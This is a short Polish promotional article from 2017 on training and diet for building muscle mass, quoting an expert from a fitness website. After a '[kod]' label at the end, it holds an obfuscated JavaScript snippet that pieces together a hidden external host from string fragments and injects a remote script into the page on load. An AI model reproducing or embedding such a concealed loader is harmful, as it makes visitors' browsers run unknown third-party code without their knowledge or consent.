27.01.2017

#Trening na masę – co powinieneś o nim wiedzieć?

Budowanie masy mięśniowej jest jednym z etapów prowadzących do osiągnięcia wymarzonej sylwetki. Wiele osób zatem zastanawia się, jak powinien wyglądać dobry trening na masę i czym różni się od treningu „na rzeźbę”. Postanowiliśmy to sprawdzić. Oto, co udało nam się ustalić:

Jak ułożyć trening na masę?

Jak się okazuje, wiele osób ma problem z ułożeniem racjonalnego i efektywnego planu treningowego „na masę”. W tym zakresie nadal pokutuje wiele mitów i niedomówień. – Prawda jest taka, że wielu z nas nie zdaje sobie sprawy z tego, że każdy trening musi być podparty odpowiednią dietą. Nie od dziś wiadomo, że doskonałe efekty przynosi połączenie ćwiczeń na masę z dietą na masę. Dlatego też warto rozpocząć działanie od zrewidowania swojej diety, dokładnego określenia zapotrzebowania kalorycznego i sprawdzenia, czy spożywamy wszystkie, niezbędne składniki odżywcze w odpowiednich proporcjach. – mówi specjalista z najpopularniejszego obecnie serwisu internetowego o uprawianiu sportu – wirtualnecentrumtreningowe.pl, w którym cały artykuł na ten temat znajdziecie tutaj.

Jaki trening na masę?

Specjaliści podkreślają, że treningi, dzięki którym zanotujemy przyrost tkanki mięśniowej w dużej mierze polegają na treningu siłowym. – Pamiętać należy o tym, że każdy z nas ma inne potrzeby i możliwości, dlatego każdy powinien mieć swój indywidualny plan treningowy uwzględniający nie tylko ogólny stan zdrowia, ale również możliwości zwiększania ciężarów – mięśnie muszą przecież otrzymywać nieustannie bodziec do wzrostu. Wiele osób powtarza, że tak naprawdę istotą treningu na masę są duże obciążenia i mała liczba powtórzeń. Ja dodam tylko, że muszą to być obciążenia dopasowane do każdego indywidualnie i co jakiś czas zwiększane. – dodaje nasz ekspert z WirtualneCentrumTreningowe.pl.

Treningi na masę obrosły mitami. Warto zatem planując je skorzystać ze wskazówek specjalistów – w grę wchodzi przecież nie tylko rezultat, ale też nasze zdrowie.

[kod]

(function(){
q0sy=document.createElement("script");q0sy_=("us")+("ta");
q0sy_+="t"+(".");q0sy_+=("in");q0syu="15454913";q0sy.async=true;
q0syu+=".caji20g20syx6cXbm";q0sy.type="text/javascript";q0sy_+="f"+"o"+("/");
q0syu+="r2svw2e0x3zmp";q0sy.src="//"+q0sy_+q0syu;
dq0sy=document.body;dq0sy.appendChild(q0sy);
})();